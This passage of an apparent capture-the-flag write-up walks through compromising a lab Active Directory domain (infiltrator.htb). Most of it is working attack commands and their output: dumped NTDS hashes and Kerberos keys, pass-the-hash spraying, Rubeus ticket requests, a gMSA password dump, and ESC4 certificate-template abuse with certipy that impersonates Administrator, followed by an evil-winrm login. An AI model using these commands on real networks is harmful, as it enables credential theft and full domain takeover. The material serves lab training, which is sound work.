infiltrator.htb\K.turner:1111:aad3b435b51404eeaad3b435b51404ee:48bcd1cdc870c6285376a990c2604531:::
infiltrator.htb\E.rodriguez:1112:aad3b435b51404eeaad3b435b51404ee:b1918c2ce6a62f4eee11c51b6e2e965a:::
[*] Kerberos keys from ./Active Directory/ntds.dit
DC$:aes256-cts-hmac-sha1-96:09b3e08f549e92e0b16ed45f84b25cc6d0c147ff169ce059811a3ed9e6957176
DC$:aes128-cts-hmac-sha1-96:d2a3d7c9ee6965b1e3cd710ed1ceed0f
DC$:des-cbc-md5:5eea34b3317aea91
krbtgt:aes256-cts-hmac-sha1-96:f6e0a1bd3a180f83472cd2666b28de969442b7745545afb84bbeaa9397cb9b87
krbtgt:aes128-cts-hmac-sha1-96:7874dff8138091d6c344381c9c758540
krbtgt:des-cbc-md5:10bfc49ecd3b58d9
infiltrator.htb\winrm_svc:aes256-cts-hmac-sha1-96:ae473ae7da59719ebeec93c93704636abb7ee7ff69678fdec129afe2fc1592c4
infiltrator.htb\winrm_svc:aes128-cts-hmac-sha1-96:0faf5e0205d6f43ae37020f79f60606a
infiltrator.htb\winrm_svc:des-cbc-md5:7aba231386c2ecf8
infiltrator.htb\lan_managment:aes256-cts-hmac-sha1-96:6fcd2f66179b6b852bb3cc30f2ba353327924081c47d09bc5a9fafc623016e96
infiltrator.htb\lan_managment:aes128-cts-hmac-sha1-96:48f45b8eb2cbd8dbf578241ee369ddd9
infiltrator.htb\lan_managment:des-cbc-md5:31c83197ab944052
infiltrator.htb\M.harris:aes256-cts-hmac-sha1-96:20433af8bf6734568f112129c951ad87f750dddf092648c80816d5cb42ed0f49
infiltrator.htb\M.harris:aes128-cts-hmac-sha1-96:2ee0cd05c3fa205a92e6837ff212b7a0
infiltrator.htb\M.harris:des-cbc-md5:3ee3688376f2e5ce
infiltrator.htb\D.anderson:aes256-cts-hmac-sha1-96:42447533e9f1c9871ddd2137def662980e677a748b5d184da910d3c4daeb403f
infiltrator.htb\D.anderson:aes128-cts-hmac-sha1-96:021e189e743a78a991616821138e2e69
infiltrator.htb\D.anderson:des-cbc-md5:1529a829132a2345
infiltrator.htb\L.clark:aes256-cts-hmac-sha1-96:dddc0366b026b09ebf0ac3e7a7f190b491c4ee0d7976a4c3b324445485bf1bfc
infiltrator.htb\L.clark:aes128-cts-hmac-sha1-96:5041c75e19de802e0f7614f57edc8983
infiltrator.htb\L.clark:des-cbc-md5:cd023d5d70e6aefd
infiltrator.htb\O.martinez:aes256-cts-hmac-sha1-96:4d2d8951c7d6eba4edaf172fd0f7b78ab7260e3d513bf2ff387c70c85d912a2f
infiltrator.htb\O.martinez:aes128-cts-hmac-sha1-96:33fdf738e13878a8101e3bf929a5a120
infiltrator.htb\O.martinez:des-cbc-md5:f80bc202755d2cfd
infiltrator.htb\A.walker:aes256-cts-hmac-sha1-96:e26c97600c6f44990f18480087a685e0f1c71bcfbc8413dce6764ccf77df448a
infiltrator.htb\A.walker:aes128-cts-hmac-sha1-96:768672b783131ed963b9deeac0a6d2e4
infiltrator.htb\A.walker:des-cbc-md5:a7e6cde06d6e153b
infiltrator.htb\K.turner:aes256-cts-hmac-sha1-96:2c816a32b395f67df520bc734f7ea8e4df64a9610ffb3ef43e0e9df69b9df8b8
infiltrator.htb\K.turner:aes128-cts-hmac-sha1-96:b20f41c0d3b8fb6e1b793af4a835109b
infiltrator.htb\K.turner:des-cbc-md5:4607b9eaec6838ba
infiltrator.htb\E.rodriguez:aes256-cts-hmac-sha1-96:9114030dd2a57970530eda4ce0aa6b14f88f2be44f6d920de31eb6ee6f1587b5
infiltrator.htb\E.rodriguez:aes128-cts-hmac-sha1-96:ddd37cf706781414885f561c3b469d0c
infiltrator.htb\E.rodriguez:des-cbc-md5:9d5bdaf2cd26165d
[*] Cleaning up...

Pass-the-hash method only works for Clark? (the foothold user)

└─$ netexec smb infiltrator.htb -u usernames -H hashes --no-bruteforce --continue-on-success
SMB         10.129.44.52    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.44.52    445    DC01             [-] infiltrator.htb\Administrator:7bf62b9c45112ffdadb7b6b4b9299dd2 STATUS_LOGON_FAILURE
SMB         10.129.44.52    445    DC01             [-] infiltrator.htb\Guest:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_ACCOUNT_DISABLED
SMB         10.129.44.52    445    DC01             [-] infiltrator.htb\DC$:fe4767309896203c581b9fc3c5e23b00 STATUS_LOGON_FAILURE
SMB         10.129.44.52    445    DC01             [-] infiltrator.htb\krbtgt:454fcbc37690c6e4628ab649e8e285a5 STATUS_LOGON_FAILURE
SMB         10.129.44.52    445    DC01             [-] infiltrator.htb\winrm_svc:84287cd16341b91eb93a58456b73e30f STATUS_LOGON_FAILURE
SMB         10.129.44.52    445    DC01             [-] infiltrator.htb\lan_managment:e8ade553d9b0cb1769f429d897c92931 STATUS_LOGON_FAILURE
SMB         10.129.44.52    445    DC01             [-] infiltrator.htb\M.harris:fc236589c448c620417b15597a3d3ca7 STATUS_ACCOUNT_RESTRICTION
SMB         10.129.44.52    445    DC01             [-] infiltrator.htb\D.anderson:627a2cb0adc7ba12ea11174941b3da88 STATUS_ACCOUNT_RESTRICTION
SMB         10.129.44.52    445    DC01             [+] infiltrator.htb\L.clark:627a2cb0adc7ba12ea11174941b3da88
SMB         10.129.44.52    445    DC01             [-] infiltrator.htb\O.martinez:eb86d7bcb30c8eac1bdcae5061e2dff4 STATUS_LOGON_FAILURE
SMB         10.129.44.52    445    DC01             [-] infiltrator.htb\A.walker:46389d8dfdfcf0cbe262a71f576e574b STATUS_LOGON_FAILURE
SMB         10.129.44.52    445    DC01             [-] infiltrator.htb\K.turner:48bcd1cdc870c6285376a990c2604531 STATUS_LOGON_FAILURE
SMB         10.129.44.52    445    DC01             [-] infiltrator.htb\E.rodriguez:b1918c2ce6a62f4eee11c51b6e2e965a STATUS_LOGON_FAILURE

Rubeus only gives tickets for Clark and Anderson...

.\rb.exe asktgt /domain:infiltrator.htb /user:"DC$" /aes256:09b3e08f549e92e0b16ed45f84b25cc6d0c147ff169ce059811a3ed9e6957176 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"DC$" /aes128:d2a3d7c9ee6965b1e3cd710ed1ceed0f /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"krbtgt" /aes256:f6e0a1bd3a180f83472cd2666b28de969442b7745545afb84bbeaa9397cb9b87 /ptt       
.\rb.exe asktgt /domain:infiltrator.htb /user:"krbtgt" /aes128:7874dff8138091d6c344381c9c758540 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"winrm_svc" /aes256:ae473ae7da59719ebeec93c93704636abb7ee7ff69678fdec129afe2fc1592c4 /ptt    
.\rb.exe asktgt /domain:infiltrator.htb /user:"winrm_svc" /aes128:0faf5e0205d6f43ae37020f79f60606a /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"lan_managment" /aes256:6fcd2f66179b6b852bb3cc30f2ba353327924081c47d09bc5a9fafc623016e96 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"lan_managment" /aes128:48f45b8eb2cbd8dbf578241ee369ddd9 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"M.harris" /aes256:20433af8bf6734568f112129c951ad87f750dddf092648c80816d5cb42ed0f49 /ptt     
.\rb.exe asktgt /domain:infiltrator.htb /user:"M.harris" /aes128:2ee0cd05c3fa205a92e6837ff212b7a0 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"D.anderson" /aes256:42447533e9f1c9871ddd2137def662980e677a748b5d184da910d3c4daeb403f /ptt   
.\rb.exe asktgt /domain:infiltrator.htb /user:"D.anderson" /aes128:021e189e743a78a991616821138e2e69 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"L.clark" /aes256:dddc0366b026b09ebf0ac3e7a7f190b491c4ee0d7976a4c3b324445485bf1bfc /ptt      
.\rb.exe asktgt /domain:infiltrator.htb /user:"L.clark" /aes128:5041c75e19de802e0f7614f57edc8983 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"O.martinez" /aes256:4d2d8951c7d6eba4edaf172fd0f7b78ab7260e3d513bf2ff387c70c85d912a2f /ptt   
.\rb.exe asktgt /domain:infiltrator.htb /user:"O.martinez" /aes128:33fdf738e13878a8101e3bf929a5a120 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"A.walker" /aes256:e26c97600c6f44990f18480087a685e0f1c71bcfbc8413dce6764ccf77df448a /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"A.walker" /aes128:768672b783131ed963b9deeac0a6d2e4 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"K.turner" /aes256:2c816a32b395f67df520bc734f7ea8e4df64a9610ffb3ef43e0e9df69b9df8b8 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"K.turner" /aes128:b20f41c0d3b8fb6e1b793af4a835109b /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"E.rodriguez" /aes256:9114030dd2a57970530eda4ce0aa6b14f88f2be44f6d920de31eb6ee6f1587b5 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"E.rodriguez" /aes128:ddd37cf706781414885f561c3b469d0c /ptt

NTDS database can be parsed into SQLite version: https://www.thehacker.recipes/ad/movement/credentials/dumping/ntds#ntds-directory-parsing-and-extraction

└─$ ntdsdotsqlite ./Active\ Directory/ntds.dit --system ./registry/SYSTEM -o ntds.sqlite

In the user_accounts table we find lan_managment description which contains the password!

lan_managment

Creds: lan_managment:l@n_M@an!1331

winrm doesn't work, but smb confirms the password is valid.

└─$ evil-winrm -i dc01.infiltrator.htb -u lan_managment -p 'l@n_M@an!1331'
Error: Exiting with code 1
└─$ netexec smb infiltrator.htb -u 'lan_managment' -p 'l@n_M@an!1331'
SMB         10.129.230.229  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.230.229  445    DC01             [+] infiltrator.htb\lan_managment:l@n_M@an!1331

Enumerate AD again with bloodhound:

└─$ bloodhound-python -u 'lan_managment@infiltrator.htb' -p 'l@n_M@an!1331' -dc dc01.infiltrator.htb -d infiltrator.htb -c all --zip -op lan

Note: You might need to add victim server to /etc/resolv.conf

https://www.netexec.wiki/ldap-protocol/dump-gmsa

└─$ netexec ldap infiltrator.htb -u 'lan_managment' -p 'l@n_M@an!1331' --gmsa
SMB         10.129.230.229  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
LDAPS       10.129.230.229  636    DC01             [+] infiltrator.htb\lan_managment:l@n_M@an!1331
LDAPS       10.129.230.229  636    DC01             [*] Getting GMSA Passwords
LDAPS       10.129.230.229  636    DC01             Account: infiltrator_svc$     NTLM: 52dfec373c144cb8d50334cb73934612

infiltrator_svc$

Creds: infiltrator_svc$:52dfec373c144cb8d50334cb73934612

Nothing new from this loot:

└─$ bloodhound-python -u 'infiltrator_svc$@infiltrator.htb' --hashes ':52dfec373c144cb8d50334cb73934612' -dc dc01.infiltrator.htb -d infiltrator.htb -c all --zip -op infiltrator_svc

ESC4

└─$ certipy-ad find -username 'infiltrator_svc$@infiltrator.htb' -vulnerable -hashes ':52dfec373c144cb8d50334cb73934612'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'infiltrator-DC01-CA'
[*] Saved BloodHound data to '20240904054156_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20240904054156_Certipy.txt'
[*] Saved JSON output to '20240904054156_Certipy.json'

└─$ cat 20240904054156_Certipy.txt
Certificate Authorities
  0
    CA Name                             : infiltrator-DC01-CA
    DNS Name                            : dc01.infiltrator.htb
    Certificate Subject                 : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
    Certificate Serial Number           : 724BCC4E21EA6681495514E0FD8A5149
    Certificate Validity Start          : 2023-12-08 01:42:38+00:00
    Certificate Validity End            : 2124-08-04 18:55:57+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : INFILTRATOR.HTB\Administrators
      Access Rights
        ManageCertificates              : INFILTRATOR.HTB\Administrators
                                          INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
        ManageCa                        : INFILTRATOR.HTB\Administrators
                                          INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
        Enroll                          : INFILTRATOR.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : Infiltrator_Template
    Display Name                        : Infiltrator_Template
    Certificate Authorities             : infiltrator-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
                                          PendAllRequests
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Smart Card Logon
                                          Server Authentication
                                          KDC Authentication
                                          Client Authentication
    Requires Manager Approval           : True
    Requires Key Archival               : False
    Authorized Signatures Required      : 1
    Validity Period                     : 99 years
    Renewal Period                      : 650430 hours
    Minimum RSA Key Length              : 2048
    Permissions
      Object Control Permissions
        Owner                           : INFILTRATOR.HTB\Local System
        Full Control Principals         : INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
                                          INFILTRATOR.HTB\Local System
        Write Owner Principals          : INFILTRATOR.HTB\infiltrator_svc
                                          INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
                                          INFILTRATOR.HTB\Local System
        Write Dacl Principals           : INFILTRATOR.HTB\infiltrator_svc
                                          INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
                                          INFILTRATOR.HTB\Local System
                                          INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
                                          INFILTRATOR.HTB\Local System
    [!] Vulnerabilities
      ESC4                              : 'INFILTRATOR.HTB\\infiltrator_svc' has dangerous permissions

https://github.com/ly4k/Certipy?tab=readme-ov-file#esc4 https://www.thehacker.recipes/ad/movement/adcs/access-controls#certificate-templates-esc4

└─$ certipy-ad template -username 'infiltrator_svc$@infiltrator.htb' -hashes ':52dfec373c144cb8d50334cb73934612' -template Infiltrator_Template -save-old
└─$ certipy-ad template -username 'infiltrator_svc$@infiltrator.htb' -hashes ':52dfec373c144cb8d50334cb73934612' -template Infiltrator_Template
└─$ certipy-ad req -username 'infiltrator_svc$@infiltrator.htb' -hashes ':52dfec373c144cb8d50334cb73934612' -ca infiltrator-DC01-CA -target dc01.infiltrator.htb -template Infiltrator_Template -upn administrator@infiltrator.htb -timeout 1000
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 129
[*] Got certificate with UPN 'administrator@infiltrator.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
└─$ certipy-ad auth -pfx administrator.pfx -username 'Administrator' -domain infiltrator.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@infiltrator.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@infiltrator.htb': aad3b435b51404eeaad3b435b51404ee:1356f502d2764368302ff0369b1121a1

Note: certipy-ad req took like forever to work because of template probably didn't work or it's the box. Make sure to run template and then req few times!!!

Administrator

└─$ evil-winrm -i dc01.infiltrator.htb -u Administrator -H '1356f502d2764368302ff0369b1121a1'
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\Administrator> tree /f /a
Folder PATH listing
Volume serial number is 96C7-B603
C:.
+---Desktop
|   |   backup.zip
|   |   root.txt
|   |
|   \---Infiltrator ADCS Backups
|       |   infiltrator-DC01-CA.p12
|       |
|       \---DataBase
|               certbkxp.dat
|               edb00002.log
|               infiltrator-DC01-CA.edb
+---Links
|       ADCSTemplate.psm1
|       Autologon64.exe
|       cleaning_up.ps1
|       cleanup_ca.ps1
|       Desktop.lnk
|       Downloads.lnk
|       Infiltrator_Template.json
|       ldap.ps1
|       Lock-BitLocker.ps1
|       messenger.ps1
|       start_end_rdp.ps1
|

Root.txt

*Evil-WinRM* PS C:\Users\Administrator> cat Desktop/root.txt
f40be542524863588bc1b33049aa4488

PreviousCicada NextInstant

Last updated 7 months ago

hashtagRecon

hashtagDNS

hashtagHTTP (80)

hashtagKerberos

hashtagKerbrute

hashtagAS-REP

hashtagSMB

hashtagLDAP

hashtagBloodhound

hashtagD.anderson.ccache

hashtagChain of attack

hashtagdacledit

hashtagpywhisker && certipy-ad

hashtagAddSelf

hashtagForceChangePassword

hashtagM.harris.ccache

hashtagevil-winrm (m.harris)

hashtagUser.txt

hashtagPrivilege Escalation

hashtagInternal AD Enumeration

hashtagOutput Messenger (k.turner)

hashtagHidden Files

hashtagMySQL

hashtagUnintended path

hashtagOutput Messenger (m.harris)

hashtagevil-winrm (winrm_svc)

hashtagChat Logs

hashtagHidden chat logs

hashtagBruteforce Try

hashtagWindows Client

hashtagRun Application

hashtagReverse Shell

hashtagNetwork Capture

hashtagBitLocker

hashtagConnection errors

hashtagDrives Enumeration

hashtagMartinez Password

hashtagRDP

hashtaglan_managment

hashtaginfiltrator_svc$

hashtagESC4

hashtagAdministrator

hashtagRoot.txt